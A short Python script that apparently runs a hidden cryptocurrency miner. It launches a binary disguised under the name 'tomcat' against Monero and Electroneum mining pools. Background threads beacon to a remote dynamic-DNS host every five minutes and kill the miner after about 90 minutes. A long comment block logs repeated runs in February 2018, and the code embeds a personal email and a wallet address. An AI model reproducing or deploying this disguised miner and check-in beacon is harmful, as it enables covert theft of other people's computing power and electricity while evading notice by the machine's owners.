import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:37:03.601031
#2018-02-17 16:22:04.962589
#2018-02-17 18:11:01.242218
#2018-02-17 19:58:07.283198
#2018-02-17 21:46:07.603250
#2018-02-17 23:31:05.971305
#2018-02-18 01:20:04.267989
#2018-02-18 03:07:04.639255
#2018-02-18 04:56:04.867000
#2018-02-18 06:49:04.059310
#2018-02-18 08:38:01.584082
#2018-02-18 10:23:07.136474
#2018-02-18 12:09:05.375996
#2018-02-18 13:54:01.949237
#2018-02-18 15:44:05.629341
#2018-02-18 17:35:03.031920
#2018-02-18 19:23:06.802943
#2018-02-18 21:08:05.797136
#2018-02-18 22:55:03.948929
#2018-02-19 00:43:03.886982
#2018-02-19 02:29:01.922449
#2018-02-19 04:15:09.571672
#2018-02-19 06:01:05.403966
#2018-02-19 07:50:05.322115
#2018-02-19 09:40:03.935804
#2018-02-19 11:28:06.026140
#2018-02-19 13:14:01.794145
#2018-02-19 15:03:02.004064
#2018-02-19 16:50:08.974381
#2018-02-19 18:38:08.687993
#2018-02-19 20:23:07.807339
#2018-02-19 22:11:06.587024
#2018-02-19 23:58:04.435536
#2018-02-20 01:45:04.251114
#2018-02-20 03:31:07.745663
#2018-02-20 05:18:07.168258
#2018-02-20 07:01:07.968299
#2018-02-20 08:47:01.936122
#2018-02-20 10:31:08.096449
#2018-02-20 12:16:06.938306
#2018-02-20 14:03:08.710235
#2018-02-20 15:47:07.490508
#2018-02-20 17:28:01.532978
#2018-02-20 19:17:08.270227
#2018-02-20 21:07:05.207300
#2018-02-20 22:52:03.920654
#2018-02-21 00:36:06.539692
#2018-02-21 02:38:07.327110
#2018-02-21 04:27:01.923860
#2018-02-21 06:15:07.968405
#2018-02-21 08:01:13.631795
#2018-02-21 09:46:10.083982
#2018-02-21 11:34:06.894745
#2018-02-21 13:23:09.245146
#2018-02-21 15:07:06.347217
#2018-02-21 16:57:08.911408
#2018-02-21 18:47:03.035229
#2018-02-21 20:34:05.483123
#2018-02-21 22:19:07.402857
#2018-02-22 00:08:04.436435
#2018-02-22 01:57:06.480482
#2018-02-22 03:44:01.719381
#2018-02-22 05:30:10.542636
#2018-02-22 07:15:09.564324
#2018-02-22 09:04:06.822766
#2018-02-22 10:52:07.558947
#2018-02-22 12:38:08.350065
#2018-02-22 14:24:01.670159
#2018-02-22 16:11:04.274150
#2018-02-22 17:56:06.268320
#2018-02-22 19:46:02.032264
#2018-02-22 21:36:03.259005
#2018-02-22 23:23:07.451900
#2018-02-23 01:12:05.148878
#2018-02-23 02:58:06.589779
#2018-02-23 04:44:05.618017
#2018-02-23 06:30:08.351438
#2018-02-23 08:18:01.289942
#2018-02-23 10:34:08.228216
#2018-02-23 12:28:04.178836
#2018-02-23 14:16:05.108766
#2018-02-23 16:06:08.011203
#2018-02-23 17:53:05.467012
#2018-02-23 19:38:06.928528
#2018-02-23 21:21:07.682582
#2018-02-23 23:08:04.777491
#2018-02-24 00:56:02.275405
#2018-02-24 02:50:07.632008
#2018-02-24 04:38:01.592246
#2018-02-24 06:22:05.258571
#2018-02-24 08:09:05.343640
#2018-02-24 09:54:05.662633
#2018-02-24 11:48:07.372948
#2018-02-24 13:40:09.050074
#2018-02-24 15:27:06.217376
#2018-02-24 17:17:06.861081
#2018-02-24 19:08:04.853827
#2018-02-24 20:56:05.434898
#2018-02-24 23:23:07.362179
#2018-02-25 03:23:04.654568
#2018-02-25 06:55:06.402249